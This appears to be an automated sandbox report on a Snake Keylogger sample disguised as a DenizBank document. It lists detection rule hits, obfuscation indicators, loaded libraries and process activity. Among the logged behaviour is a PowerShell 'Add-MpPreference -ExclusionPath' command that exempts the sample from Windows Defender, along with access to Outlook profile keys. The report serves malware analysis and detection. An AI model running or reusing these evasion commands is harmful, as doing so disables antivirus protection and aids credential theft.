Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, ---.cs	Base64 encoded string: 'NX7D3X7VrTc0eaq7nc1oiZiVcEN8triRP2K7rT9KDWcLM7FjQiSzTlwWGYmrDcHm'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, ---.cs	Base64 encoded string: 'NX7D3X7VrTc0eaq7nc1oiZiVcEN8triRP2K7rT9KDWcLM7FjQiSzTlwWGYmrDcHm'

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/8@4/3

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\denizbank 25.11.2024 E80 aspc.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Mutant created: \Sessions\1\BaseNamedObjects\iGoyAN

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tx2x2e5c.zxc.ps1

Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: denizbank 25.11.2024 E80 aspc.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dwrite.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: riched20.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: usp10.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: edputil.dll			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: yGuK.pdb source: denizbank 25.11.2024 E80 aspc.exe
Source:	Binary string: yGuK.pdbSHA256 source: denizbank 25.11.2024 E80 aspc.exe

Data Obfuscation

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: denizbank 25.11.2024 E80 aspc.exe, LogInGUI.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	.Net Code: UsNjU4XiWf System.Reflection.Assembly.Load(byte[])
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	.Net Code: UsNjU4XiWf System.Reflection.Assembly.Load(byte[])

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: 0xE3290D87 [Sun Oct 8 04:01:11 2090 UTC]

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07238C4E pushad ; retf		0_2_07238C55
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A9C30 push esp; retf 0145h		5_2_011A9D55
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19233 push es; ret		5_2_06A19244

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: section name: .text entropy: 7.944205970111451

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, q8qlp0MKt6bc6fpogf.cs	High entropy of concatenated method names: 'oJ3gaFH9BQ', 'iHcguTXgBD', 'an1gg3NXcY', 'N4DghjFwcK', 'c95g9m8LgK', 'CrJgL0mdea', 'Dispose', 'k4GJT2r9PB', 'kZwJBUuIoo', 'gl9JHQXnOv'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, WYNTdRwdLMl5qTPEQ1.cs	High entropy of concatenated method names: 'Cwkq4ceZtE', 'DPkqWj5PNI', 'XWGqi7gMwk', 'PuWqXNSZ2U', 'v6eqOWsr69', 'D15qsjuRDV', 'WBxqPYryjL', 'Q7sq8m31Zx', 'KTCqo6wevs', 'b3lqYR8tPu'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, cTXo4LieQS7llBmlju.cs	High entropy of concatenated method names: 'VuLZe0as2H', 'aFMZBAmpkV', 'fZJZCM15ha', 'GPuZxQ8m7L', 'b7TZtARkyh', 'TIUC3FnvJE', 'SZECIESDoB', 'vyRCMmuHLO', 'NfACrWtj1M', 'jxYCkcFHZg'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	High entropy of concatenated method names: 'tsWmeWVjPV', 'zFtmTRuGhy', 'rSPmBCJJ1f', 'sP8mHtoLBO', 'lltmCg4m1T', 'bPTmZWf7K5', 'xACmx8W1s3', 'DKMmtUFT6r', 'Qibmvm8WUY', 'hVGmKGPa3y'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	High entropy of concatenated method names: 'l7dBAVxOJ1', 'YtnBVjgfyg', 'cC3BnGdbj6', 'uE5B6MKhss', 'OhEB3Rw60F', 'dnLBIj5yNe', 'AkWBMsp6I4', 'miVBreSW2x', 'ccjBk390gy', 'VMUB2b6Ink'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, j9cpiJ66Z9wiSMtdK0.cs	High entropy of concatenated method names: 'A1FuKNUuFR', 'xsKufkAB19', 'ToString', 'zMDuTSHwbw', 'FceuBgK86E', 'IE6uHPnKob', 'Xa2uCWPYF8', 'l1QuZH3KgV', 'KXBux9ZGam', 'sGEut2JHFK'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, V4kQeGERxknqoQkEuwR.cs	High entropy of concatenated method names: 'ToString', 'CB4h4fGGPm', 'qSAhWdqH4Y', 'WPihFUV0H7', 'os7hidYyv0', 'oqkhXXTyCy', 'PFjhcJWONj', 'VethOl6tJC', 'EVZ6KclBLPxOLu5JuMi', 'b73wW9lNas1DWFf11RR'
